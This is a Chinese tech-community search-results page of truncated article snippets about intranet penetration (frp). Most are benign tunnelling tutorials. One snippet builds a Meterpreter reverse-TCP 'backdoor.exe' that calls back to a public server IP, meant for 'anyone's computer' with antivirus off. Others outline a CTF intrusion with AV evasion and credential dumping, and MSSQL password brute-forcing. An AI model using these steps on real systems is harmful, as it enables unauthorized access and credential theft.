首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

内网接收外网shell(内网穿透)

前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。...工具: 我们到官网上下载就好了: https://github.com/fatedier/frp/releases 我这里下载的是最新版,当然我们还需要准备一台服务器,腾讯什么就好 轻量级就可以了,...然后我们还需要加上msf用的端口 直接加在这下面就好,名字随意,4445这个端口也可以随意,但是要记住后面要用 然后其他的不变,这里需要注意一点,服务器的安全组策略需要将7000,8000和6000三个开启,这里以腾讯举例...LHOST=101.43.1.181 LPORT=8000 -f exe -o backdoor.exe -o选择文件名,ip地址选择外网服务器的地址 端口选择8000 下载到桌面 我这里用xshell...windows/meterpreter/reverse_tcp 设置IP和端口 然后我们生成就好,放到任意谁的电脑上,但是要关杀软,因为我们没加免杀,Windows自带的检测也要关闭 运行后成功外网上线

1.4K20
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    外网打点到内网横向

    - 弱鸡 (ruoji.info) 第一个flag–外网打点 第一个flag就是签到题,当时图忘记留了,就是直接就给出flag了 图片 图片 Z-BlogPHP 1.7.2CMS,后台路径是zb_system...c8aZaU CS简单做个免杀套个壳改一下特征码即可实现绕火绒,上传上去之后cs上线 这地方到后面几天,免杀也不行了,虽说上传上去了但是运行不上线,用powershell进行上线 上传fscan进行内网探测...len:20 title:Apache Tomcat/8.5.15 [] WebTitle:http://192.168.1.129:8888 code:200 len:32 title:宝塔面板·腾讯专享版...#外网对应内网地址 [+] SSH:192.168.1.129:22:root root #蜜罐 192.168.243.135:3306 open 192.168.243.135:135 open...129几乎全是蜜罐 第三个flag-内网横向 cs上线 图片 抓取密码 -logonpasswords Authentication Id : 0 ; 506030 (00000000:0007b8ae

    1.2K30

    如何利用腾讯实现内网穿透?

    最近已经有几个省不给家庭用户公网IP了,估计会逐步扩展收回公网IP,如果我们想在外面访问家里的NAS或者其他服务那只能选择内网穿透了,自建内网穿透服务器是一个不错的选择,特别是最近各大服务器厂商为抢占市场不断降价促销...,服务器的性价比都不错。...案例: 做微信公众号开发、小程序开发等----> 域名代理模式 想在外网通过ssh连接内网的机器,做服务器到内网服务器端口的映射,----> tcp代理模式 在非内网环境下使用内网dns,或者需要通过...udp访问内网机器等----> udp代理模式 在外网使用HTTP代理访问内网站点----> http代理模式 搭建一个内网穿透ss,在外网如同使用内网V**一样访问内网资源或者设备----> socks5...VPS,要有公网IP的,我推荐腾讯的: 如果你是新用户有优惠,建议能买多长时间就买多长时间,因为优惠价的服务器到期后续费很贵的,而且新用户优惠只能买一次,所以尽量买长时间点划算。

    25.7K116

    FRP内网穿透单机传奇架设外网

    看着这个标题我我自己都有点懵,大概意思就是用自己家的电脑架设一个传奇服务端,然后用FRP内网穿透可以在外网玩,标题写的有点纠结,就这样吧。...请先准备工具: 1.电脑(能上网的那种); 2.服务器1台(自己玩1M宽带即可,很多人玩就自己看着办); 3.一个支持frp内网穿透的路由器(好像有软件也可以支持,没试过); 4.好像没了(一个脑子༼...∗ •̀ (oo) •́ ∗ ༽) 开始搞事情 先在服务器上面安装frp内网穿透:Frp内网穿透Frp一键安装脚本及设置教程 然后就在路由器设置和服务器没啥太大的关系了。...爱游这里配置了所有端口,就是测试的时候配置的,事实证明并不需要,只需要7000,7100,7200端口 还有就是要在基本设置里面设置成外网的IP地址,不然是不开门的。 ?...下面是在外网访问的效果:(图片大让它加载一会会儿) ?

    4.3K30

    内网外网MSSQL口令扫描渗透

    在实际渗透过程中,往往通过SQL注入或者弱口令登录后台,成功获取了Webshell,但对于如何进行内网渗透相当纠结,其实在获取入口权限的情况下,通过lcx端口转发等工具,进入内网,可以通过数据库、系统账号等口令扫描来实施内网渗透...本文就介绍如何在内网中进行MSSQL口令扫描及获取服务器权限。...1.使用SQLPing扫描获取mssql口令 在SQLPing程序目录,配置好passlist.txt和userlist.txt文件,如图1所示,设置扫描的IP地址及其范围,本案例是针对内网开始地址192.100.100.1...Passwordlist根据实际收集的密码来进行扫描,如果是普通密码破解,则可以使用top10000password这种字典,在内网中可以逐渐加强该字典,将收集到的所有用户密码全部加入。...XML********登录192.100.100.33服务器,如图16所示成功获取内网中一台服务器权限。

    2.4K60

    腾讯 API 3.0实践分享

    原文来自:腾讯计算产品团队 原文地址:https://cloud.tencent.com/developer/article/1151836 转载原因:非常不错的实践教程 ---- 产品的每次更新迭代都意味着一种提升和进步...第二,API3.0版本更加统一规范而且详细的接口文档和错误码描述,更加方便用户使用腾讯所有产品以及降低用户定位问题的门槛。...1、SDK 和 API 为方便开发者调试和接入腾讯产品 API,腾讯提供了不同语言版本的 SDK 。在此,我也建议用户尽可能使用 SDK,各语言版本的 SDK 可以在腾讯 SDK 中心下载。...Filter 的数据结构为: 示例代码: 返回结果如下: 4、CLI 的使用 除了提供 SDK ,腾讯还提供了好用的腾讯命令行工具(TCCLI),该命令行工具的使用是非常简单的,我这里就不举例说明了...腾讯API官方交流群:711269805

    3K30
    领券